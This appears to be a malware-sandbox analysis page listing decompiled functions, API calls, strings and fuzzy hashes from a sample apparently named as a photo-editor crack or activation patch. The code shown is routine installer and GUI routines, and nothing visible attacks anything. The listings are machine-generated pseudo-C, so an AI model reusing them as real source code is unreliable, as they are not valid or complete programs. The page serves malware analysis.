.NET Framework CreateAssemblyCache function failed, xrefs: 0045A0F2

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AddressProc
String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
API String ID: 190572456-3990135632
Opcode ID: 47528f8cc21b60fe5fd6cbfcf43eb270d72f12e503475e47cc24ebc3cb25aa49
Instruction ID: 9a321e89453ba4f36132349ca91dc91ba75a1bd21e0a38aa57df13fbbf55b943
Opcode Fuzzy Hash: 47528f8cc21b60fe5fd6cbfcf43eb270d72f12e503475e47cc24ebc3cb25aa49
Instruction Fuzzy Hash: B831A970D006059BCB11EFA5C84169EF7B5AF44715F40867BE910A7382DB3C9A188799

Uniqueness

Uniqueness Score: -1.00%

Function 0041C5D8 Relevance: 10.6, APIs: 7, Instructions: 70
windowCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E0041C5D8(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, struct HPALETTE__* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
				char _v5;
				struct HPALETTE__* _v12;
				struct HWND__* _v16;
				struct HDC__* _v20;
				struct tagBITMAPINFO* _t42;
				intOrPtr _t49;
				struct HPALETTE__* _t51;
				struct HBITMAP__* _t53;
				void* _t56;

				_t42 = __ecx;
				_t51 = __edx;
				_t53 = __eax;
				E0041C4D8(__eax, _a4, __ecx);
				_v12 = 0;
				_v16 = GetFocus();
				_v20 = GetDC(_v16);
				_push(_t56);
				_push(0x41c683);
				_push( *[fs:eax]);
				 *[fs:eax] = _t56 + 0xfffffff0;
				if(_t51 != 0) {
					_v12 = SelectPalette(_v20, _t51, 0);
					RealizePalette(_v20);
				}
				_v5 = GetDIBits(_v20, _t53, 0, _t42->bmiHeader.biHeight, _a8, _t42, 0) != 0;
				_pop(_t49);
				 *[fs:eax] = _t49;
				_push(0x41c68a);
				if(_v12 != 0) {
					SelectPalette(_v20, _v12, 0);
				}
				return ReleaseDC(_v16, _v20);
			}

0x0041c5e1
0x0041c5e3
0x0041c5e5
0x0041c5ee
0x0041c5f5
0x0041c5fd
0x0041c609
0x0041c60e
0x0041c60f
0x0041c614
0x0041c617
0x0041c61c
0x0041c62a
0x0041c631
0x0041c631
0x0041c64f
0x0041c655
0x0041c658
0x0041c65b
0x0041c664
0x0041c670
0x0041c670
0x0041c682

APIs

Part of subcall function 0041C4D8: GetObjectA.GDI32(?,00000018), ref: 0041C4E5

GetFocus.USER32 ref: 0041C5F8
GetDC.USER32(?), ref: 0041C604
SelectPalette.GDI32(?,?,00000000), ref: 0041C625
RealizePalette.GDI32(?), ref: 0041C631
GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C648
SelectPalette.GDI32(?,00000000,00000000), ref: 0041C670
ReleaseDC.USER32 ref: 0041C67D

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Palette$Select$BitsFocusObjectRealizeRelease
String ID:
API String ID: 3303097818-0
Opcode ID: 06f70be5c2937d22c7d59323c1d4f85c74eb10055d491e17f779f64a32073242
Instruction ID: 25388d08763cc31724119198cc62293da4a252d14e83de2780c9a5f0ba17a272
Opcode Fuzzy Hash: 06f70be5c2937d22c7d59323c1d4f85c74eb10055d491e17f779f64a32073242
Instruction Fuzzy Hash: C6116A71A40608BBDB10EBE9CC85FAFB7FCEF48700F15446AB518E7281D6789D008B68

Uniqueness

Uniqueness Score: -1.00%

Function 0048603C Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61
registryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0048603C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _v8;
				char _v12;
				intOrPtr _t34;
				void* _t43;

				_v12 = 0;
				_push(_t43);
				_push(0x4860f4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t43 + 0xfffffff8;
				if(E0042E2AC(0, "System\\CurrentControlSet\\Control\\ProductOptions", 0x80000002,  &_v8, 1, 0) != 0) {
					L9:
					_pop(_t34);
					 *[fs:eax] = _t34;
					_push(E004860FB);
					return E00403400( &_v12);
				}
				if(E0042E1DC() != 0) {
					if(E00406F54(_v12, 0x486148) != 0) {
						if(E00406F54(_v12, "LanmanNT") != 0) {
							if(E00406F54(_v12, "ServerNT") == 0) {
								 *0x49f45e = 3;
							}
						} else {
							 *0x49f45e = 2;
						}
					} else {
						 *0x49f45e = 1;
					}
				}
				RegCloseKey(_v8);
				goto L9;
			}

0x00486047
0x0048604c
0x0048604d
0x00486052
0x00486055
0x00486073
0x004860de
0x004860e0
0x004860e3
0x004860e6
0x004860f3
0x004860f3
0x00486087
0x00486098
0x004860b2
0x004860cc
0x004860ce
0x004860ce
0x004860b4
0x004860b4
0x004860b4
0x0048609a
0x0048609a
0x0048609a
0x00486098
0x004860d9
0x00000000

APIs

Part of subcall function 0042E2AC: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00485FB3,?,00000001,?,?,00485FB3,?,00000001,00000000), ref: 0042E2C8

RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,004860F4), ref: 004860D9

Strings

WinNT, xrefs: 00486089
ServerNT, xrefs: 004860BD
LanmanNT, xrefs: 004860A3
System\CurrentControlSet\Control\ProductOptions, xrefs: 00486060
ProductType, xrefs: 00486078

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CloseOpen
String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
API String ID: 47109696-2530820420
Opcode ID: c9539a08b2b853992093d52bd6a45a0801c08c2e485eb2d00d7f5d93e4191c3f
Instruction ID: a713916a89d0883095a157a8cdf94fb09fad54fb56f7fa23aac7c7215c81ef38
Opcode Fuzzy Hash: c9539a08b2b853992093d52bd6a45a0801c08c2e485eb2d00d7f5d93e4191c3f
Instruction Fuzzy Hash: C411BF30604248AADB82FB65CC45B9FBBA9DB12314F524977A800E7283EB3DDE45871D

Uniqueness

Uniqueness Score: -1.00%

Function 00498374 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E00498374(void* __eax, void* __ebx, long* __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				struct HDC__* _v8;
				struct tagSIZE _v16;
				struct tagTEXTMETRICA _v72;
				signed int _t26;
				signed int _t27;
				void* _t36;
				intOrPtr _t43;
				long* _t45;
				signed int* _t47;
				void* _t50;

				_t37 = __ecx;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t45 = __ecx;
				_t47 = __edx;
				_t36 = __eax;
				_v8 = GetDC(0);
				_push(_t50);
				_push(0x498400);
				_push( *[fs:eax]);
				 *[fs:eax] = _t50 + 0xffffffbc;
				SelectObject(_v8, E0041A678(_t36, _t36, _t37, _t45, _t47));
				GetTextExtentPointA(_v8, "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz", 0x34,  &_v16);
				asm("cdq");
				_t26 = _v16.cx / 0x1a + 1;
				_t27 = _t26 >> 1;
				if(_t26 < 0) {
					asm("adc eax, 0x0");
				}
				 *_t47 = _t27;
				GetTextMetricsA(_v8,  &_v72);
				 *_t45 = _v72.tmHeight;
				_pop(_t43);
				 *[fs:eax] = _t43;
				_push(E00498407);
				return ReleaseDC(0, _v8);
			}

0x00498374
0x0049837a
0x0049837b
0x0049837c
0x0049837d
0x0049837f
0x00498381
0x0049838a
0x0049838f
0x00498390
0x00498395
0x00498398
0x004983a7
0x004983bb
0x004983c8
0x004983cb
0x004983cc
0x004983ce
0x004983d0
0x004983d0
0x004983d3
0x004983dd
0x004983e5
0x004983e9
0x004983ec
0x004983ef
0x004983ff

APIs

GetDC.USER32(00000000), ref: 00498385

Part of subcall function 0041A678: CreateFontIndirectA.GDI32(?), ref: 0041A737

SelectObject.GDI32(00000000,00000000), ref: 004983A7
GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00498925), ref: 004983BB
GetTextMetricsA.GDI32(00000000,?), ref: 004983DD
ReleaseDC.USER32 ref: 004983FA

Strings

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 004983B2

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Text$CreateExtentFontIndirectMetricsObjectPointReleaseSelect
String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
API String ID: 2948443157-222967699
Opcode ID: 40663912515a33d48857a7cc17ded0f9fd9d2e35270be9166755b58ff18b4f99
Instruction ID: c67935f8e5cb56b1937036d64f6bf01096dd8c8546995d157710775fc85ec82d
Opcode Fuzzy Hash: 40663912515a33d48857a7cc17ded0f9fd9d2e35270be9166755b58ff18b4f99
Instruction Fuzzy Hash: 10018875604605AFEB00DFE9CC41F5FB7ECDB49704F51447AB500E7281EA78AD008B68

Uniqueness

Uniqueness Score: -1.00%

Function 0044CDDC Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 57
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0044CDDC(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				struct HINSTANCE__* _t26;
				intOrPtr _t31;
				intOrPtr _t39;

				_push(0);
				_push(0);
				_push(_t39);
				_push(0x44ce9e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t39;
				if( *0x49e778 == 0) {
					E0044CDAC( &_v12);
					E0042C88C(_v12,  &_v8);
					E0040357C( &_v8, "oleacc.dll");
					_t26 = LoadLibraryA(E00403738(_v8));
					if(_t26 != 0) {
						 *0x49e780 = GetProcAddress(_t26, "LresultFromObject");
						 *0x49e784 = GetProcAddress(_t26, "CreateStdAccessibleObject");
						if( *0x49e780 != 0 &&  *0x49e784 != 0) {
							 *0x49e77c = 1;
						}
					}
					 *0x49e778 = 1;
				}
				asm("sbb ebx, ebx");
				_pop(_t31);
				 *[fs:eax] = _t31;
				_push(0x44cea5);
				return E00403420( &_v12, 2);
			}

0x0044cddf
0x0044cde1
0x0044cde8
0x0044cde9
0x0044cdee
0x0044cdf1
0x0044cdfb
0x0044ce00
0x0044ce0b
0x0044ce18
0x0044ce2b
0x0044ce2f
0x0044ce3c
0x0044ce4c
0x0044ce58
0x0044ce63
0x0044ce63
0x0044ce58
0x0044ce6d
0x0044ce6d
0x0044ce7f
0x0044ce85
0x0044ce88
0x0044ce8b
0x0044ce9d

APIs

Part of subcall function 0044CDAC: GetSystemDirectoryA.KERNEL32 ref: 0044CDC4

LoadLibraryA.KERNEL32(00000000,00000000,0044CE9E,?,?,?,?,00000000,00000000), ref: 0044CE26
GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044CE37
GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044CE47

Strings

CreateStdAccessibleObject, xrefs: 0044CE41
oleacc.dll, xrefs: 0044CE13
LresultFromObject, xrefs: 0044CE31

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
API String ID: 2141747552-1050967733
Opcode ID: 14653013c98fb470257b5737bccf183d4ad65966b4cfca4d022605a10a362f1f
Instruction ID: a702f4643fe6e099115479b548097bfe9a63d2924ca5d738d996a727133e4afc
Opcode Fuzzy Hash: 14653013c98fb470257b5737bccf183d4ad65966b4cfca4d022605a10a362f1f
Instruction Fuzzy Hash: 65119170602308ABF710EFA2DCC2B5A77A8E794708F64047BA00066691D7BD99448A1D

Uniqueness

Uniqueness Score: -1.00%

Function 0041B8F2 Relevance: 10.6, APIs: 7, Instructions: 57
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041B8F2() {
				void* _t40;
				void* _t43;
				void* _t44;

				if( *(_t44 - 0x10) != 0) {
					_t40 = SelectObject( *(_t44 - 0x18),  *(_t44 - 4));
					_t43 = SelectObject( *(_t44 - 0x1c),  *(_t44 - 0x10));
					StretchBlt( *(_t44 - 0x1c), 0, 0,  *(_t44 - 0xc),  *(_t44 - 8),  *(_t44 - 0x18), 0, 0,  *(_t44 - 0x30),  *(_t44 - 0x2c), 0xcc0020);
					if(_t40 != 0) {
						SelectObject( *(_t44 - 0x18), _t40);
					}
					if(_t43 != 0) {
						SelectObject( *(_t44 - 0x1c), _t43);
					}
				}
				DeleteDC( *(_t44 - 0x18));
				DeleteDC( *(_t44 - 0x1c));
				return  *(_t44 - 0x10);
			}

0x0041b8f6
0x0041b905
0x0041b914
0x0041b93b
0x0041b942
0x0041b949
0x0041b949
0x0041b950
0x0041b957
0x0041b957
0x0041b950
0x0041b960
0x0041b969
0x0041b977

APIs

SelectObject.GDI32(00000000,?), ref: 0041B900
SelectObject.GDI32(?,00000000), ref: 0041B90F
StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B93B
SelectObject.GDI32(00000000,00000000), ref: 0041B949
SelectObject.GDI32(?,00000000), ref: 0041B957
DeleteDC.GDI32(00000000), ref: 0041B960
DeleteDC.GDI32(?), ref: 0041B969

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: ObjectSelect$Delete$Stretch
String ID:
API String ID: 1458357782-0
Opcode ID: 9877176484a70d403600f1714a00c8a025884f8eac3cfbcae5058479fbc8ea05
Instruction ID: 7af7168ee4e3f122af8b0d4427163761b09037522acd9a56f3a9582fc2e5d9ca
Opcode Fuzzy Hash: 9877176484a70d403600f1714a00c8a025884f8eac3cfbcae5058479fbc8ea05
Instruction Fuzzy Hash: F7117CB2E40559ABDF10D6D9D885FAFB7BCEF08304F004416B714FB241C678A8418B94

Uniqueness

Uniqueness Score: -1.00%

Function 00423824 Relevance: 10.6, APIs: 7, Instructions: 56
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00423824(long __eax, short __edx) {
				struct tagPOINT _v24;
				long _t7;
				long _t12;
				long _t19;
				struct HWND__* _t26;
				short _t27;
				void* _t29;
				struct tagPOINT* _t30;

				_t7 = __eax;
				_t30 = _t29 + 0xfffffff8;
				_t27 = __edx;
				_t19 = __eax;
				if(__edx !=  *((intOrPtr*)(__eax + 0x28))) {
					 *((short*)(__eax + 0x28)) = __edx;
					if(__edx != 0) {
						L5:
						_t7 = SetCursor(E004237FC(_t19, _t27));
					} else {
						GetCursorPos(_t30);
						_push(_v24.y);
						_t26 = WindowFromPoint(_v24);
						if(_t26 == 0) {
							goto L5;
						} else {
							_t12 = GetWindowThreadProcessId(_t26, 0);
							if(_t12 != GetCurrentThreadId()) {
								goto L5;
							} else {
								_t7 = SendMessageA(_t26, 0x20, _t26, E0040625C(SendMessageA(_t26, 0x84, _v24, _v24.y), 0x200));
							}
						}
					}
				}
				return _t7;
			}

0x00423824
0x00423828
0x0042382b
0x0042382d
0x00423833
0x00423835
0x0042383c
0x00423898
0x004238a3
0x0042383e
0x0042383f
0x00423844
0x00423851
0x00423855
0x00000000
0x00423857
0x0042385a
0x00423868
0x00000000
0x0042386a
0x00423891
0x00423891
0x00423868
0x00423855
0x0042383c
0x004238ae

APIs

GetCursorPos.USER32 ref: 0042383F
WindowFromPoint.USER32(?,?), ref: 0042384C
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0042385A
GetCurrentThreadId.KERNEL32 ref: 00423861
SendMessageA.USER32 ref: 0042387A
SendMessageA.USER32 ref: 00423891
SetCursor.USER32(00000000), ref: 004238A3

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
String ID:
API String ID: 1770779139-0
Opcode ID: 70500f7dcf266beb48586870626c57fb13a9a50022589c1df5f619c5c3ec88b1
Instruction ID: af43fee0338c9e624ebb6e65c196278dc7248109df2d757125d2dc099b9481b9
Opcode Fuzzy Hash: 70500f7dcf266beb48586870626c57fb13a9a50022589c1df5f619c5c3ec88b1
Instruction Fuzzy Hash: 4C01B16230431136D6207A795C86E2F26E8DFC5B19F50413FB509BE282DA3D8C00636D

Uniqueness

Uniqueness Score: -1.00%

Function 004019CC Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E004019CC() {
				signed int _t13;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E00401A82);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x49e420);
				L00401320();
				if( *0x49e036 != 0) {
					_push(0x49e420);
					L00401328();
				}
				E00401390(0x49e440);
				E00401390(0x49e450);
				E00401390(0x49e47c);
				 *0x49e478 = LocalAlloc(0, 0xff8);
				if( *0x49e478 != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x49e478; // 0x5d99e8
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x49e464)) = 0x49e460;
					 *0x49e460 = 0x49e460;
					 *0x49e46c = 0x49e460;
					 *0x49e419 = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E00401A89);
				if( *0x49e036 != 0) {
					_push(0x49e420);
					L00401330();
					return 0;
				}
				return 0;
			}

0x004019d1
0x004019d2
0x004019d7
0x004019da
0x004019dd
0x004019e2
0x004019ee
0x004019f0
0x004019f5
0x004019f5
0x004019ff
0x00401a09
0x00401a13
0x00401a24
0x00401a30
0x00401a32
0x00401a37
0x00401a37
0x00401a3f
0x00401a43
0x00401a44
0x00401a50
0x00401a53
0x00401a55
0x00401a5a
0x00401a5a
0x00401a63
0x00401a66
0x00401a69
0x00401a75
0x00401a77
0x00401a7c
0x00000000
0x00401a7c
0x00401a81

APIs

RtlInitializeCriticalSection.KERNEL32(0049E420,00000000,00401A82,?,?,0040222E,0049E460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
RtlEnterCriticalSection.KERNEL32(0049E420,0049E420,00000000,00401A82,?,?,0040222E,0049E460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
LocalAlloc.KERNEL32(00000000,00000FF8,0049E420,00000000,00401A82,?,?,0040222E,0049E460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
RtlLeaveCriticalSection.KERNEL32(0049E420,00401A89,00000000,00401A82,?,?,0040222E,0049E460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C

Strings

`I, xrefs: 00401A4B
`I, xrefs: 00401A55

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID: `I$`I
API String ID: 730355536-3984424023
Opcode ID: 64002adec9d96eccb06c3eb006b1eb85ee1d021eaacb40bd1b5c7d4f0963175f
Instruction ID: 94269b02b44d1611755d75869bdd1b1cad58823c34eb859de2800409b3eb1631
Opcode Fuzzy Hash: 64002adec9d96eccb06c3eb006b1eb85ee1d021eaacb40bd1b5c7d4f0963175f
Instruction Fuzzy Hash: BC01C070644240AEFB19EB6B98027253ED4D799748F11883BF440A6AF1CABD4840CB6E

Uniqueness

Uniqueness Score: -1.00%

Function 00498198 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E00498198(void* __eax, void* __edx) {
				void _v52;
				void* _t9;
				struct HINSTANCE__* _t12;
				intOrPtr* _t13;
				void* _t18;
				intOrPtr* _t22;
				void* _t25;
				intOrPtr* _t26;

				_t18 = __edx;
				_t25 = __eax;
				_t12 = GetModuleHandleA("user32.dll");
				_t22 = GetProcAddress(_t12, "MonitorFromRect");
				_t13 = GetProcAddress(_t12, "GetMonitorInfoA");
				if(_t22 == 0 || _t13 == 0) {
					L4:
					return E00498160(1, _t18);
				} else {
					_t9 =  *_t22(_t25, 2);
					 *_t26 = 0x28;
					_push(_t26);
					_push(_t9);
					if( *_t13() == 0) {
						goto L4;
					}
					_push(_t18);
					return memcpy(_t18,  &_v52, 4 << 2);
				}
			}

0x0049819f
0x004981a1
0x004981ad
0x004981ba
0x004981c7
0x004981cb
0x004981f6
0x00000000
0x004981d1
0x004981d4
0x004981d8
0x004981df
0x004981e0
0x004981e5
0x00000000
0x00000000
0x004981e7
0x00000000
0x004981f3

APIs

GetModuleHandleA.KERNEL32(user32.dll), ref: 004981A8
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 004981B5
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 004981C2

Strings

MonitorFromRect, xrefs: 004981AF
GetMonitorInfoA, xrefs: 004981BC
user32.dll, xrefs: 004981A3

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
API String ID: 667068680-2254406584
Opcode ID: 5be428eabab937aecaf376b261ae7240ba502668b3757660f019f9de16c27e60
Instruction ID: c24bc2e529edd3fc2f7d71c8166a3bd51aa09706bb3324dad5a4058a97bc4c43
Opcode Fuzzy Hash: 5be428eabab937aecaf376b261ae7240ba502668b3757660f019f9de16c27e60
Instruction Fuzzy Hash: D5F09662B81A1566DA20257E1C42A7B69CCCB87764F14017FBE44B7383EDAD8C0646BD

Uniqueness

Uniqueness Score: -1.00%

Function 0045DA18 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 34
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0045DA18(struct HINSTANCE__* __eax) {
				struct HINSTANCE__* _t11;
				intOrPtr _t17;

				_t11 = __eax;
				 *0x49f080 = GetProcAddress(__eax, "ISCryptGetVersion");
				 *0x49f084 = GetProcAddress(_t11, "ArcFourInit");
				 *0x49f088 = GetProcAddress(_t11, "ArcFourCrypt");
				if( *0x49f080 == 0 ||  *0x49f084 == 0) {
					L4:
					 *0x49f080 = 0;
					 *0x49f084 = 0;
					 *0x49f088 = 0;
					return 0;
				} else {
					_t17 =  *0x49f088;
					if(_t17 == 0) {
						goto L4;
					} else {
						return  *0x49f080() - 0x00000001 & 0xffffff00 | _t17 == 0x00000000;
					}
				}
			}

0x0045da19
0x0045da26
0x0045da36
0x0045da46
0x0045da52
0x0045da72
0x0045da76
0x0045da7e
0x0045da86
0x0045da8d
0x0045da5d
0x0045da5d
0x0045da64
0x00000000
0x0045da66
0x0045da71
0x0045da71
0x0045da64

APIs

GetProcAddress.KERNEL32(00000000,ISCryptGetVersion), ref: 0045DA21
GetProcAddress.KERNEL32(00000000,ArcFourInit), ref: 0045DA31
GetProcAddress.KERNEL32(00000000,ArcFourCrypt), ref: 0045DA41

Strings

ISCryptGetVersion, xrefs: 0045DA1B
ArcFourInit, xrefs: 0045DA2B
ArcFourCrypt, xrefs: 0045DA3B

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

